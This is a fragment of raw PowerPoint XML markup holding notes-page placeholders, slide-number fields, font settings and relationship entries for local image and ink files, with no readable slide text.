                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47D6D798-5613-7C48-BA95-92F954BD1C1B}"/>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40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7D482FE3-E702-5846-B17A-273DA3EFC0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32582FD-AB80-3442-9E53-0AE1D4E1FBC1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134147" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32A5052F-247A-1644-9D62-6E4DA71F203C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="696913"/>
            <a:ext cx="6188075" cy="3481387"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134148" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77F87F5C-F891-5C4F-98EA-9F50E68EF192}"/>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3483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8766ABC4-369F-A140-9EA7-50A301E167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0CA50C47-E4C1-DA45-97CE-3893B3371714}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135171" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE5E483C-DA7B-CD44-9CF3-B16C7D9E036C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="696913"/>
            <a:ext cx="6188075" cy="3481387"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135172" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{853D8C7D-398A-374B-B5F1-E19A9A532C8A}"/>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64836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AE97EEE5-7A9B-A042-B775-4BA3A3BBD1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CC273F0-FE77-8544-B52C-8632C276577F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137219" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91931A5E-F66B-5C4D-9BB8-533ED248AB64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="696913"/>
            <a:ext cx="6188075" cy="3481387"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137220" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46C8B17E-6BD7-4D41-8AD8-D34170010620}"/>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307138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4CD52F7-2C9E-114E-BF0F-A022AA44CC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35C40AF7-1FBD-394C-8397-D8470497C8FE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122883" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B1168BB-7AA3-9545-8150-3C0ECF43B68A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122884" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E15A56B-F975-B34E-9F31-6CD41FA380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92944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6A2AEED8-92A9-944B-80DD-A4E80C0E2C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0CC7C60-9996-0149-90F8-72D3CD5FADD5}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138243" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0B160EE-DFF8-3C44-8218-B44726C15F8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138244" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{509F9CE4-ECE6-D74F-B16B-AC00141A7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7339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6A2AEED8-92A9-944B-80DD-A4E80C0E2C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0CC7C60-9996-0149-90F8-72D3CD5FADD5}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138243" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0B160EE-DFF8-3C44-8218-B44726C15F8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138244" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{509F9CE4-ECE6-D74F-B16B-AC00141A79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94264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9F8A5-8FD6-EA4C-8C10-4D7FB5642262}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396747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2CF4A54A-4032-FD46-9B39-CC137F0C8410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139267" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F988E919-9107-EC47-921A-3FFAFB687E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9268" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B53B7B-B0B9-2D47-866E-7ECEFC20F2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6C6EB174-8172-E648-BE01-C55387275D94}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>77</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24406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D4CD52F7-2C9E-114E-BF0F-A022AA44CC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35C40AF7-1FBD-394C-8397-D8470497C8FE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122883" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B1168BB-7AA3-9545-8150-3C0ECF43B68A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122884" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E15A56B-F975-B34E-9F31-6CD41FA380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30998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B3278C46-9D09-1048-8DC6-3E7DF50D5F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5E3EBA03-A53E-7F44-BCBB-030C79F3A3C1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121859" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A410EA29-A78E-1642-8B1C-1AFFDDD0A2DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121860" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBFAF1D0-0DD7-A24E-9411-22932D61F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DF89B2F7-C72A-9844-A3BE-39DE97EAEE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9058C486-D32B-C946-B2F8-9D7660A03802}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123907" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{988486FF-F1F3-3946-A1BE-D3CD3875E8A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123908" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4D63F7-C0FB-CA41-9264-053668E493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1206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2CFCC737-B267-BA4B-80EB-983FF59DDF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2C6542F7-8E3D-324A-A727-85FFDB2E56EC}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124931" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B33461D-21D0-F949-B97B-B6CB5CD9E9F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124932" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39D8468C-0FDC-A24E-A2ED-D057970BF8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581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1CC038D9-9645-5047-9273-50AB78E10E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499EB57-D4C2-0344-A8FE-5FE862627F41}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125955" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45E8729E-FB4E-6744-8889-8CAD5CC037D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="696913"/>
            <a:ext cx="6188075" cy="3481387"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125956" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56A3EA5D-083A-3044-9E5B-148F6938ED7D}"/>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61171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1E5504A0-627A-0D4A-A75E-0BF7F6F70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98B006A2-5D9A-2548-9F10-F1DCF7EDFD5E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126979" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3D07729-1CB0-A149-A835-1D7B731EF016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="696913"/>
            <a:ext cx="6188075" cy="3481387"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126980" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E930ADDB-62A6-384B-861F-8286F968FE09}"/>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792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1E5504A0-627A-0D4A-A75E-0BF7F6F709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98B006A2-5D9A-2548-9F10-F1DCF7EDFD5E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126979" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3D07729-1CB0-A149-A835-1D7B731EF016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="696913"/>
            <a:ext cx="6188075" cy="3481387"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126980" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E930ADDB-62A6-384B-861F-8286F968FE09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="698500" y="4408488"/>
            <a:ext cx="5588000"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4601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10/4/21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877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564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0609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26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10/4/21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75607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1838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631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12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96967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10/4/21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957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10/4/21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30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10/4/21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355354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1.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image" Target="../media/image3.tiff"/><Relationship Id="rId21"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customXml" Target="../ink/ink2.xml"/><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24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink8.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.tiff"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.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customXml" Target="../ink/ink1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8.xml"/><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customXml" Target="../ink/ink20.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide26.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34.jpe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21.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink23.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.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customXml" Target="../ink/ink25.xml"/><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customXml" Target="../ink/ink24.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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customXml" Target="../ink/ink28.xml"/><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customXml" Target="../ink/ink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image" Target="../media/image56.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink33.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image550.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image520.png"/><Relationship Id="rId9" 